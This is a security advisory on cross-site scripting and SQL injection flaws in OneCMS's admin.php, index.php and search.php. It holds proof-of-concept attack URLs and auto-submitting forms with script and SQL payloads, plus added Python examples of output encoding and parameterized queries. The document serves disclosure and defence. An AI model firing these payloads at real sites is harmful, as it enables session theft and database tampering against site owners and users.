Multiple Vulnerabilities in OneCMS

2010-06-10T00:00:00
ID HTB22432
Type htbridge
Reporter High-Tech Bridge
Modified 2010-06-10T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in OneCMS which could be exploited to perform cross-site scripting and SQL injection attacks.

1) Cross-site scripting (XSS) vulnerabilities in OneCMS
The vulnerabilities exist due to insufficient sanitization of the "cat" and "Short1" parameters in admin/admin.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website. Successful exploitation requires that the victim is logged in and has access to the administrative interface.
Exploitation examples:
http://example.com/admin/admin.php?cat=cheats%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
<form action="http://example.com/admin/admin.php?view=manage&edit=2" method="post" name="main" >
<input type="hidden" name="id[]" value="1" />
<input type="hidden" name="cat_1" value="news" />
<input type="hidden" name="name_1" value="OneCMS News title" />
<input type="hidden" name="lev_1" value="No" />
<input type="hidden" name="Full1" value="news full text" />
<input type="hidden" name="systems1" value="" />
<input type="hidden" name="games1" value="" />
<input type="hidden" name="Short1" value='short"><script>alert(document.cookie)</script>' />
<input type="hidden" name="image1" value="" />
<input type="hidden" name="Add" value="Submit Changes" />
</form>
<script>
document.main.submit();
</script>
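Both XSS findings above have the same shape: a parameter value is reflected into an HTML attribute without encoding, and the payload's leading double quote closes that attribute before a <script> element follows. The following Python example is added here to illustrate the defect class and its fix; it is not OneCMS code (the real admin.php template is not on the page, so the input markup and function names are assumptions). It renders the same attribute three ways, then parses the result the way a browser would to check whether the parameter survived as a single attribute value.

```python
import html
from html.parser import HTMLParser

# Constructed sample value standing in for the "cat" parameter of admin/admin.php.
# It mirrors the attribute-breakout shape used in the advisory's example:
# a double quote terminates the attribute, then a <script> element follows.
CAT_PAYLOAD = 'cheats"><script>alert(document.cookie)</script>'


def render_cat_input_vulnerable(cat: str) -> str:
    """Reflect the parameter into an attribute value with no encoding at all.

    Stand-in for the defect class the advisory describes (assumed markup;
    the actual OneCMS template is not on the page).
    """
    return '<input type="text" name="cat" value="' + cat + '">'


def render_cat_input_partially_encoded(cat: str) -> str:
    """Encode < and > but not quotes: still unsafe inside an attribute.

    The payload's leading quote still terminates the attribute, so new
    attributes (e.g. event handlers) could be injected even though the
    literal <script> tag is neutralised.
    """
    return ('<input type="text" name="cat" value="'
            + html.escape(cat, quote=False) + '">')


def render_cat_input_hardened(cat: str) -> str:
    """Encode for the attribute context: quote=True also encodes " and '."""
    return ('<input type="text" name="cat" value="'
            + html.escape(cat, quote=True) + '">')


class _TagCollector(HTMLParser):
    """Collects (tag, attrs) pairs, i.e. what a browser would actually parse."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup: str):
    """Return the list of (tag, attrs) start tags found in the markup."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def round_trips(markup: str, expected_value: str) -> bool:
    """True only if the markup parses to exactly one <input> whose value
    attribute equals the original parameter, i.e. the encoding kept the
    data/markup boundary intact."""
    tags = parse_tags(markup)
    return (len(tags) == 1
            and tags[0][0] == "input"
            and tags[0][1].get("value") == expected_value)


if __name__ == "__main__":
    for name, render in [("vulnerable", render_cat_input_vulnerable),
                         ("partial", render_cat_input_partially_encoded),
                         ("hardened", render_cat_input_hardened)]:
        markup = render(CAT_PAYLOAD)
        print(f"{name:10s} tags={[t for t, _ in parse_tags(markup)]} "
              f"round_trips={round_trips(markup, CAT_PAYLOAD)}")
```

The round-trip check is the useful property to test in a code base: for any input, the parsed attribute value must equal the value you intended to emit. Escaping only angle brackets passes a naive "no <script> in the output" grep yet fails that check, which is why the partially encoded variant is included.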

2) SQL injection vulnerabilities in OneCMS
2.1 The vulnerability exists due to insufficient sanitization of the "id" parameter in index.php. A remote attacker can send a specially crafted HTTP GET request to the vulnerable script and execute arbitrary SQL commands in the application's database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
http://host/index.php?load=af&view=click&id=3'+any sql

2.2 The vulnerability exists due to insufficient sanitization of the "search" parameter in search.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary SQL commands in the application's database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
<form action="http://example.com/search.php?view=forums" method="post" name="main" >
<input type="hidden" name="search" value="1+any sql" />
</form>
<script>
document.main.submit();
</script>
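Findings 2.1 and 2.2 share one root cause and one remediation: the "id" and "search" values are concatenated into SQL text, so a quote in the input reaches the SQL parser as code. The Python example below is added here to show that contrast and is not OneCMS code; the table name, columns and function names are assumptions, and the in-memory SQLite database is constructed for the demonstration. It uses the advisory's own "3' any sql" value (the "+" in the URL decoded to a space): against concatenated SQL it produces a syntax error, which is the tell-tale a defender sees in error logs, while a bound parameter is simply compared as a value and matches nothing.

```python
import sqlite3

# The advisory's example value for index.php's "id", with the URL "+" decoded.
ID_PAYLOAD = "3' any sql"


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the table index.php?view=click reads by id
    (assumed schema; the real OneCMS schema is not on the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE downloads (id INTEGER PRIMARY KEY, name TEXT, clicks INTEGER)"
    )
    conn.executemany(
        "INSERT INTO downloads VALUES (?, ?, ?)",
        [(1, "editor", 10), (2, "patch", 5), (3, "map-pack", 0)],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, id_param: str):
    """Concatenates the raw parameter into the statement text: the defect
    class the advisory describes (assumed query shape)."""
    sql = "SELECT id, name FROM downloads WHERE id = '" + id_param + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, id_param: str):
    """Binds the parameter: whatever it contains is compared as a value,
    never parsed as SQL."""
    return conn.execute(
        "SELECT id, name FROM downloads WHERE id = ?", (id_param,)
    ).fetchall()


def is_valid_id(id_param: str) -> bool:
    """Allow-list validation for an integer key: defence in depth in front
    of the bound query, and a cheap place to log rejected input."""
    return id_param.isdigit()


def lookup_validated(conn: sqlite3.Connection, id_param: str):
    """Validate first, then bind. Rejected input never reaches the database."""
    if not is_valid_id(id_param):
        raise ValueError("id must be a positive integer")
    return conn.execute(
        "SELECT id, name FROM downloads WHERE id = ?", (int(id_param),)
    ).fetchall()


def probe(conn: sqlite3.Connection, id_param: str) -> str:
    """Classify the vulnerable path's behaviour for a given input.

    A database syntax error on attacker-shaped input is the signature that
    the parameter is being interpreted as SQL code rather than data.
    """
    try:
        lookup_vulnerable(conn, id_param)
        return "rows"
    except sqlite3.OperationalError:
        return "sql-error"


if __name__ == "__main__":
    db = make_db()
    for value in ("3", ID_PAYLOAD):
        print(f"id={value!r}: concatenated -> {probe(db, value)}, "
              f"bound -> {lookup_parameterized(db, value)}, "
              f"valid -> {is_valid_id(value)}")
```

The same pattern applies unchanged to the "search" POST field in search.php: bind the value (for a LIKE query, bind the pattern and escape the wildcard characters in it) rather than splicing it into the statement. Note that the bound query returns no rows for the payload because the whole string, quote included, is compared against the integer column.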